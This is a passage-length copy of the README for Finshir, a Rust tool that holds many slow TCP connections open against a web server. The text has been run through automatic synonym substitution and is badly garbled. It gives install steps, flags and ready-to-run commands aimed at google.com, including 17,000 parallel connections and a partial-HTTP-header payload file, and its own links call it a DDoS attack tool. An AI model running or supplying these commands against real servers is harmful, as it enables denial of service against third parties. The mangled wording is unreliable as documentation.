Finshir - A Coroutines-Driven Depression Too Deadening Traffic Sender, Written Inwards Rust

You are seeing a high-performant, coroutines-driven, in addition to fully customisable implementation of Low & Slow load generator designed for real-world pentesting. You tin give the sack easily torify/proxify it using diverse platform-dependent utilities.

Demonstration

Advantages

• Coroutines-driven. Finshir uses coroutines (also called lightweight threads) instead of ordinary threads, which lets y'all opened upwards many to a greater extent than connections amongst fewer organization resources.
  
• Generic. Unlike other Low & Slow utilities, Finshir lets y'all transmit arbitrary information sets over the TCP protocol. It may hold upwards partial HTTP headers, empty spaces, in addition to then on.
  
• Written inwards Rust. How y'all tin give the sack see, all the logic is written completely inwards Rust, which agency that it leverages bare-metal performance in addition to high-level security (no SIGSEGV, SIGILL, in addition to other "funny" stuff).
  

Disadvantages

• Platform-dependent. Like most of pentesting utilities, this projection is developed for alone UNIX-based systems. If y'all are a Windows user, y'all in all likelihood require a virtual machine or to a greater extent than or less other reckoner amongst UNIX.

Installation

Building from crates.io

$ cargo install finshir

Building from sources

$ git clone https://github.com/Gymmasssorla/finshir.git $ cd finshir $ cargo ready --release

Pre-compiled binaries

$ wget https://github.com/Gymmasssorla/finshir/releases/download/vX.X.X/finshir-x86_64-linux $ chmod a+x finshir-x86_64-linux

Usage

Flags

Name	Explanation
-h, --help	Prints deal information
--use-tls	Use a TLS connectedness instead of the ordinary TCP protocol. It mightiness hold upwards used to examine HTTPS-based services.
-V, --version	Prints version information

Options

Name	Value	Default	Explanation
--connect-periodicity	Time span	7secs	This pick volition hold upwards applied if a socket connectedness mistake occurs (the adjacent connectedness volition hold upwards performed after this periodicity)
--connect-timeout	Time span	10secs	Try connect a socket within a specified timeout. If a timeout is reached in addition to a socket wasn't connected, the computer program volition retry the functioning later
--connections	Positive integer	1000	A give away of connections the computer program volition handgrip simultaneously. This pick likewise equals to a give away of coroutines
--date-time-format	String	%X	A format for displaying local engagement in addition to fourth dimension inwards log messages. Type man strftime to meet the format specification
--failed-count	Positive integer	5	A give away of failed information transmissions used to reconnect a socket to a remote spider web server
--ip-ttl	Unsigned integer	None	Specifies the IP_TTL value for all hereafter sockets. Usually this value equals a give away of routers that a package tin give the sack become through
--json-report	Filename	None	A file to which a JSON study (also called a "total summary") volition hold upwards generated earlier exiting
-f, --portions-file	Filename	None	A file which consists of a custom JSON array of information portions, specified every bit strings. When a coroutine finished sending all portions, it reconnects its socket in addition to starts sending them again.
-r, --receiver	Socket address	None	A receiver of generator traffic, specified every bit an IP address (or a domain name) in addition to a port number, separated past times a colon
-d, --test-duration	Time span	64years 64hours 64secs	A whole examine duration, after which all spawned coroutines volition halt their work
--text-report	Filename	None	A file to which the computer program volition generate a human-readable study (also called a "total summary") earlier exiting
-v, --verbosity	From 0 to 5	3	Enable 1 of the possible verbosity levels. The null floor doesn't impress anything, in addition to the final floor prints everything. Note that specifying the four in addition to five verbosity levels mightiness decrease performance, produce it alone for debugging.
-w, --wait	Time span	5secs	A waiting fourth dimension bridge earlier examine execution used to preclude a launch of an erroneous (unwanted) test
--write-periodicity	Time span	30secs	A fourth dimension interval betwixt writing information portions. This pick tin give the sack hold upwards used to modify examine intensity
--write-timeout	Time span	10secs	If a timeout is reached in addition to a information part wasn't sent, the computer program volition retry the functioning later
--xml-report	Filename	None	A file to which an XML study (also called a "total summary") volition hold upwards generated earlier exiting

Overview

Minimal command
The next ascendency spawns chiliad coroutines, each trying to works life a novel TCP connection. When connections are established, it sends empty spaces every thirty seconds, thereby club a server to hold off every bit long every bit it can:

# Specify 1 of the Google's IP addresses every bit a target spider web server $ finshir --receiver=google.com:80

Test intensity
Low & Slow techniques assume to hold upwards VERY SLOW, which agency that y'all typically ship a dyad of bytes every north seconds. For instance, Finshir uses the thirty seconds interval past times default, but it's modifiable every bit well:

# Test the Google's server sending information portions every 1 infinitesimal $ finshir --receiver=google.com:80 --write-periodicity=1min

Connections count
The default give away of parallel connections is 1000. However, y'all tin give the sack modify this bound using the --connections option, but hold upwards certain that y'all organization is able to handgrip such amount of file descriptors:

# Modify the default bound of file descriptors to 17015 $ sudo ulimit -n 17015  # Test the target server using 17000 parallel TCP connections $ finshir --receiver=google.com:80 --connections=17000

Logging options
Consider specifying a custom verbosity floor from 0 to five (inclusively), which is done past times the --verbosity option. There is likewise the --date-time-format pick which tells Finshir to utilization your custom date-time format.

# Use a custom date-time format in addition to the final verbosity floor $ finshir --receiver=google.com:80 --date-time-format="%F" --verbosity=5

Different verbosity levels impress dissimilar logging types. As y'all tin give the sack meet inwards the tabular array below, the null verbosity floor prints nothing, in addition to the final 1 prints everything. The levels inwards the middle impress logs selectively:

	Errors	Warnings	Notifications	Debugs	Traces
Zero (0)	❌	❌	❌	❌	❌
First (1)	✔	❌	❌	❌	❌
Second (2)	✔	✔	❌	❌	❌
Third (3)	✔	✔	✔	❌	❌
Fourth (4)	✔	✔	✔	✔	❌
Fifth (5)	✔	✔	✔	✔	✔

TLS support
Most of spider web servers today utilization the HTTPS protocol instead of HTTP, which is based on TLS. Since v0.2.0, Finshir has functionality to connect through TLS using the --use-tls flag.

# Connect to the Google's server through TLS on 443 port (HTTPS) $ finshir --receiver=google.com:443 --use-tls

Custom information portions
By default, Finshir generates 100 empty spaces every bit information portions to send. You tin give the sack override this demeanour past times specifying your custom messages every bit a file, consisting of a unmarried JSON array. This instance is focused on Google:

# Send partial HTTP headers to Google using `--portions-file` $ finshir --receiver=google.com:443 -f files/google.json --use-tls

The ascendency inwards a higher house sends a partial HTTPS asking (first introduced past times Slowloris) through TLS (which is achieved past times specifying the --use-tls flag). You tin give the sack access this partial asking within files/google.json.
(files/google.json)

[   "GET https://www.google.com/ HTTP/1.1\r\n",   "Host: www.google.com\r\n",   "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0\r\n",   "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",   "Accept-Language: en-US,en;q=0.5\r\n",   "Accept-Encoding: gzip, deflate, br\r\n",   "Connection: keep-alive\r\n",   "Upgrade-Insecure-Requests: 1\r\n",   "Cache-Control: max-age=0\r\n",   "TE: Trailers\r\n",   "\r\n" ]

Generate a report
Report is a laid of statistics variables similar a total give away of connections established, a total give away of failed transmissions in addition to then on. There is 3 options for this: --xml-report, --json-report, in addition to --text-report:

# Test the Google's server in addition to generate a JSON study at the halt $ finshir --receiver=google.com:80 --json-report=report.json

What agency "at the end"? Well, Finshir volition generate a study for y'all either if allotted fourth dimension expires or if y'all cancel the procedure past times Ctrl-C. You tin give the sack hold off at the study examples inwards the files/reports folder:
(files/reports/report.json)

{   "connections": {     "failed": "0",     "successful": "305",     "total": "305"   },   "receiver": "google.com:80",   "time": {     "test-duration": "4s 71ms 819us 653ns",     "test-start": "Wed, 29 May 2019 22:04:34 -0000"   },   "total-bytes-sent": "305",   "total-errors": "0",   "transmissions": {     "failed": "0",     "successful": "305",     "total": "305"   } }

(files/reports/report.xml)

    google.com:80   159   0        Wed, 29 May 2019 22:04:16 -0000     2s 289ms 664us 988ns           159     0     159           159     0     159    

(files/reports/report.txt)

*********************** FINSHIR REPORT *********************** Receiver:                 google.com:80 Total bytes sent:         535 Total errors:             0  Test start:               Wed, 29 May 2019 22:04:55 -0000 Test duration:            7s 385ms 765us 179ns  Successful connections:   535 Failed connections:       0 Total connections:        535  Successful transmissions: 535 Failed transmissions:     0 Total transmissions:      535 **************************************************************

If none of the options inwards a higher house has been specified, Finshir prints a study correct to your terminal. That is, y'all tin give the sack merely run a test, cancel it later, in addition to meet the results which y'all tin give the sack easily save. Perfect!

Contributing
You are ever welcome for whatever contribution to this project! But earlier y'all start, y'all should read the appropriate document to know near the preferred evolution procedure in addition to the basic communication rules.

Legal disclaimer
Finshir was developed every bit a agency of testing stress resistance of spider web servers, in addition to non for hacking, that is, the writer of the projection IS NOT RESPONSIBLE for whatever impairment caused past times your utilization of his program.

Project references

• https://www.reddit.com/r/rust/comments/bm6ttn/finshir_a_coroutinesdriven_low_slow_ddos_attack/
• https://www.producthunt.com/posts/finshir
• https://www.reddit.com/r/hacking/comments/bpg0by/ive_written_a_customizable_optimized_alternative/
• https://news.ycombinator.com/item?id=19931443
• https://www.reddit.com/r/rust/comments/bpor6b/finshir_a_coroutinesdriven_and_fully_customizable/
• https://news.ycombinator.com/item?id=19962333
• https://www.reddit.com/r/rust/comments/bqyaok/finshir_v022_was_released_any_suggestions_to_low
• https://www.reddit.com/r/rust/comments/btdu1a/finshir_v030_was_released_now_with_report/

Contacts
Temirkhan Myrzamadi <gymmasssorla@gmail.com> (the author)

Download Finshir